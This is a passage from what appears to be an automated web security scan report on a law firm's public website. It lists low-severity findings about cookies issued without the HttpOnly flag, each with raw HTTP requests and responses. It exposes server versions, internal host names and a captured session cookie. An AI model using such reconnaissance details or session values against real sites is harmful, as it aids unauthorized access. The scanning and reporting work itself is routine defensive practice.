The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/general.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 19292
Content-Type: text/css
Last-Modified: Mon, 27 Dec 2010 22:23:40 GMT
Accept-Ranges: bytes
ETag: "f9e76fb614a6cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:48 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 19292

@charset "utf-8";
/* CSS Document */
html, body {margin: 0px; padding: 0px; background-color:#FFFFFF; text-align: center; color:#000000; font-family: Arial, Helvetica, sans-serif;}
.wrapper {width:
...[SNIP]...

10.95. http://www.hoganlovells.com/FCWSite/Include/merger/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/home.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 7991
Content-Type: text/css
Last-Modified: Mon, 29 Nov 2010 23:35:40 GMT
Accept-Ranges: bytes
ETag: "e53048221e90cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:51 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 7991

@charset "utf-8";
/* CSS Document */

/* Home Page, Left Navigation */
body.home .bodyContent {width: 895px; margin:0px auto; height: 336px; text-align:left;}
body.home .bodyContent .leftnav {wid
...[SNIP]...

10.96. http://www.hoganlovells.com/FCWSite/Include/merger/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/menu.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 21510
Content-Type: text/css
Last-Modified: Mon, 27 Dec 2010 22:23:40 GMT
Accept-Ranges: bytes
ETag: "564a72b614a6cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:49 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 21510

.../* Main Header */
body .header {width: 895px; margin:0px auto; height: 126px; padding: 0px; top: 0px; text-align:left;}
body .header .logo {width: 112px; float:left; top: 0px; margin: 0px; paddin
...[SNIP]...

10.97. http://www.hoganlovells.com/FCWSite/Include/merger/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/print.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 1628
Content-Type: text/css
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "467940b81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:55 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1628

body                {background:#fff;margin:5px;}
.print                {display:block;}
.logoprint            {display:block;text-align:right;}
#header            {display:none;}
#subnav            {display:none;}
.blue                {display:none;}
.bl
...[SNIP]...

10.98. http://www.hoganlovells.com/FCWSite/Include/spamproof.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/spamproof.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/spamproof.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 1788
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "f69e66b81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:02 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

// SpamProof jscript methods
//To be used to prevent spammers from grabbing email addresses from a website
//
//Example:
//For more information contact our <Script language="JavaScript">PrintMail(
...[SNIP]...

10.99. http://www.hoganlovells.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=0WwaaTWEr0ZqP9vltK5fchXHRMYI1SgX8FEx_oPvYZIucwicwbXnvZBCvi4AYPieWu16bm_iKFTSLFCX_lHfeFuPDVM1&t=634245951056860295 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:18:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Tue, 10 Jan 2012 23:11:31 GMT
Last-Modified: Sat, 06 Nov 2010 04:05:05 GMT
Content-Type: application/x-javascript
Content-Length: 20794
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

10.100. http://www.hoganlovells.com/aboutus/history/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aboutus/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97393


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.101. http://www.hoganlovells.com/aboutus/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aboutus/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94661


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an
...[SNIP]...

10.102. http://www.hoganlovells.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /de/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=f8307c75-afc6-47c2-bcc9-05e6ce2e6da5; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.103. http://www.hoganlovells.com/es/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /es/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:12 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=a40a92ff-2e69-4b79-aa30-0c1bc0a78076; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 88749


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.104. http://www.hoganlovells.com/fr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /fr/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=615eedbc-fa87-4a07-9a8b-00391cec67e4; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.105. http://www.hoganlovells.com/include/hoganConfig.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include/hoganConfig.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include/hoganConfig.xml?0.519872459582984 HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/FCWSite/Include/merger/HoganBanner32.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1109; PortletId=1004701; SiteId=1039; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.1.10.1295449738; is_returning=1

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: ZoneId=0; path=/
Set-Cookie: SiteId=1039; path=/
Cache-Control: private
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 3157
Content-Length: 3157

<?xml version="1.0" encoding="UTF-8"?><banner><object param="useAutoPlay" value="1" /><object param="autoPlayDelay" value="12" /><object param="itemsOffset" value="5" /><object param="itemsX" value="2
...[SNIP]...

10.106. http://www.hoganlovells.com/include_common/NetInsight/ntpagetag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/NetInsight/ntpagetag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/NetInsight/ntpagetag.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 6845
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Jul 2008 18:15:02 GMT
Accept-Ranges: bytes
ETag: "097112f70f2c81:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:56 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

/* Unica Page Tagging Script v1.1
* Copyright 2004-2006 Unica Corporation. All rights reserved.
* Visit http://www.unica.com for more information.
*/

var NTPT_IMGSRC = '/include_common/NetIn
...[SNIP]...

10.107. http://www.hoganlovells.com/include_common/YUI/colorpicker-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/YUI/colorpicker-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/YUI/colorpicker-min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 16763
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 23:39:04 GMT
Accept-Ranges: bytes
ETag: "09c631ed875c91:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:42 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
YAHOO.util.Color=function(){var A="0123456789A
...[SNIP]...

10.108. http://www.hoganlovells.com/include_common/YUI/container-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/YUI/container-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

